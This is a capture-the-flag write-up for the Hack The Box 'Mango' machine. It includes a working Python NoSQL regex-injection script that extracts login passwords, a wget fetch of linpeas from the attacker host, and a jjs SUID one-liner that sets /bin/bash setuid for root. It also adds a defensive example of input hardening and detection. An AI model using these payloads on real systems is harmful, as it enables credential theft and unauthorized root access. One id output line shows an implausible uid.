Mango

Mango is a very well crafted machine and I really enjoyed working on it, as it presents a lot of learning opportunities. Enumeration is the key on this box, and some scripting knowledge is required as well.
Recon
Let's kick off the nmap scan:
# nmap -sS -sC -sV -O -T4 -oN mango.htb.nmap.txt 10.10.10.162
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-10 17:32 EST
Nmap scan report for 10.10.10.162
Host is up (0.024s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/10%OT=22%CT=1%CU=36516%PV=Y%DS=2%DC=I%G=Y%TM=5FD2A2
OS:25%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.27 seconds

Notes:
- We have SSH and a web server running on this machine
- It's a Linux server, probably Ubuntu, and the web server is Apache/2.4.29
- The SSL certificate reveals a possible subdomain: staging-order.mango.htb
Enumeration
For the subdomain to be accessible, let's update /etc/hosts on our attack machine and point both the domain mango.htb and the subdomain staging-order.mango.htb to the IP of the machine.
Fire up gobuster/dirbuster and run it against both the domain and the subdomain. One of the interesting directories is vendor, where we can see composer, indicating that the web server is running PHP. The installed.json file at the URL below reveals that the backend is a MongoDB database.

view-source:http://staging-order.mango.htb/vendor/composer/installed.json
After trying several other rabbit holes, I decided to give NoSQL injection a go and stumbled upon the following:
https://book.hacktricks.xyz/pentesting-web/nosql-injection
https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
The script was easy to work with and revealed two users: admin and mango.
python3 enumerate_nosql.py -u http://staging-order.mango.htb -up username -pp password -ep username -op login:login -m post
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
No pattern starts with 'h'
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
No pattern starts with 'n'


2 username(s) found:
admin
mango

Now, let's limit the usernames to just admin and mango and pass them to the password guessing function as below:
import requests
import string

url = "http://staging-order.mango.htb"
headers = {"Host": "staging-order.mango.htb"}
cookies = {"PHPSESSID": "bdjh6mo6p9nsv6os7a3s2susig"}
# Regex metacharacters are backslash-escaped so they match literally; the escapes are stripped from the result.
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\" + c for c in string.punctuation + string.whitespace]


def get_password(username):
    print("Extracting password of " + username)
    params = {"username": username, "password[$regex]": "", "login": "login"}
    password = "^"
    while True:
        for c in possible_chars:
            # A 302 redirect means the login succeeded, i.e. the regex prefix matched.
            params["password[$regex]"] = password + c + ".*"
            pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
            if int(pr.status_code) == 302:
                password += c
                break
            if c == possible_chars[-1]:
                # No character extends the prefix any further: the full password has been recovered.
                print("Found password " + password[1:].replace("\\", "") + " for username " + username)
                return password[1:].replace("\\", "")


def get_usernames():
    usernames = []
    params = {"username[$regex]": "", "password[$regex]": ".*", "login": "login"}
    for c in possible_chars:
        username = "^" + c
        params["username[$regex]"] = username + ".*"
        pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
        if int(pr.status_code) == 302:
            print("Found username starting with " + c)
            while True:
                for c2 in possible_chars:
                    params["username[$regex]"] = username + c2 + ".*"
                    if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
                        username += c2
                        print(username)
                        break

                if c2 == possible_chars[-1]:
                    print("Found username: " + username[1:])
                    usernames.append(username[1:])
                    break
    return usernames


userlist = ['admin', 'mango']
# for u in get_usernames():
for u in userlist:
    get_password(u)

Now, run the script and you should have both passwords:
python3 ./nosql-bruteforce-creds.py
Extracting password of admin
Found password tXXXXXXXXXXXXXX#2 for username admin
Extracting password of mango
Found password h3mXXXXXXXXXXX5H for username mango

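To see why the script above works, and what closes the hole, here is an added example that is not part of the original write-up or the box's code: a simplified model of how PHP decodes a field named password[$regex] into an array, the filter a naive login handler would build from it, and a hardened builder that refuses anything but plain strings. The php_form_decode helper and the payload string are my own constructions, not the box's real code.

```python
import re
from urllib.parse import parse_qsl


def php_form_decode(body: str) -> dict:
    """Simplified stand-in for how PHP fills $_POST: key[sub]=v becomes {key: {sub: v}}.
    Only one bracket level is handled; real PHP nests arbitrarily."""
    out = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        match = re.fullmatch(r"([^\[\]]+)\[([^\[\]]*)\]", key)
        if match:
            out.setdefault(match.group(1), {})[match.group(2)] = value
        else:
            out[key] = value
    return out


def build_filter_vulnerable(form: dict) -> dict:
    """Copies the decoded form values straight into the MongoDB filter.
    A dict value such as {"$regex": "^t.*"} is then treated as a query operator."""
    return {"username": form.get("username"), "password": form.get("password")}


class BadRequest(ValueError):
    """Raised when a login field is not a plain string."""


def build_filter_hardened(form: dict) -> dict:
    """Requires scalar strings, so an operator object can never reach the query."""
    clean = {}
    for field in ("username", "password"):
        value = form.get(field)
        if not isinstance(value, str):
            raise BadRequest(f"{field} must be a string, got {type(value).__name__}")
        clean[field] = value
    return clean


def contains_operator(value) -> bool:
    """Detection helper for logging or a WAF rule: True if any nested key starts with '$'."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    return False


# Constructed request body shaped like the ones the enumeration script sends.
CONSTRUCTED_PAYLOAD = "username=admin&password[$regex]=^t.*&login=login"
```

Running the hardened builder over CONSTRUCTED_PAYLOAD raises BadRequest, while the vulnerable builder happily produces a filter with a $regex operator in it; the same check works for $ne, $gt and the other operators.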
Exploit
Now, let's log in over SSH as mango:
ssh mango@mango.htb
The authenticity of host 'mango.htb (10.10.10.162)' can't be established.
ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'mango.htb,10.10.10.162' (ECDSA) to the list of known hosts.
mango@mango.htb's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

 System information as of Fri Dec 11 17:48:36 UTC 2020

 System load: 0.08 Processes: 103
 Usage of /: 26.9% of 19.56GB Users logged in: 0
 Memory usage: 19% IP address for ens33: 10.10.10.162
 Swap usage: 0%


 * Canonical Livepatch is available for installation.
 - Reduce system reboots and improve kernel security. Activate at:
 https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.


Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138
mango@mango:~$ sudo -l
[sudo] password for mango:
Sorry, user mango may not run sudo on mango.
mango@mango:~$ ls

Let's copy linpeas.sh over and execute it to enumerate further:
/linPEAS$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.162 - - [11/Dec/2020 13:50:29] "GET /linpeas.sh HTTP/1.1" 200 -


wget http://10.10.14.25:8000/linpeas.sh
--2020-12-11 18:58:14-- http://10.10.14.25:8000/linpeas.sh
Connecting to 10.10.14.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 300193 (293K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh 100%[===============================================>] 293.16K 790KB/s in 0.4s

2020-12-11 18:58:15 (790 KB/s) - ‘linpeas.sh’ saved [300193/300193]
Post-exploit
Linpeas will reveal a SUID executable that we can exploit at /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs, and GTFOBins has a one-liner that can help us escape to a shell.
However, the binary is only executable by the root user and the admin group. We already have the admin password, so we can run su - admin to become the admin user.
admin@mango:/tmp$ echo "Java.type('java.lang.Runtime').getRuntime().exec('chmod +s /bin/bash').waitFor()" | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> Java.type('java.lang.Runtime').getRuntime().exec('chmod +s /bin/bash').waitFor()
0

bash-4.4$ ./bash -p
bash-4.4# ls
bash root.txt tmux-1000
hsperfdata_root systemd-private-baebb2e962894d26b9de6ad944174518-apache2.service-fiNfaB vmware-root_406-558405545
linpeas.sh systemd-private-baebb2e962894d26b9de6ad944174518-systemd-resolved.service-pd1pg3
mongodb-27017.sock systemd-private-baebb2e962894d26b9de6ad944174518-systemd-timesyncd.service-dk1Wi0
Now you are root:
bash-4.4# id
uid=4000000000(admin) gid=1001(admin) euid=0(root) groups=1001(admin)
bash-4.4# whoami
root
bash-4.4# cd /root
bash-4.4# ls -all
total 40
drwx------ 6 root root 4096 Oct 10 2019 .
drwxr-xr-x 23 root root 4096 Sep 27 2019 ..
lrwxrwxrwx 1 root root 9 Sep 27 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Sep 30 2019 .cache
drwx------ 3 root root 4096 Sep 30 2019 .gnupg
drwxr-xr-x 3 root root 4096 Sep 30 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 33 Dec 11 15:13 root.txt
drwx------ 2 root root 4096 Sep 27 2019 .ssh
-rw------- 1 root root 3895 Oct 10 2019 .viminfo
bash-4.4# cat root.txt
07XXXXXXXXXXXXXXXXXXXXXXXXXXXd89
bash-4.4#
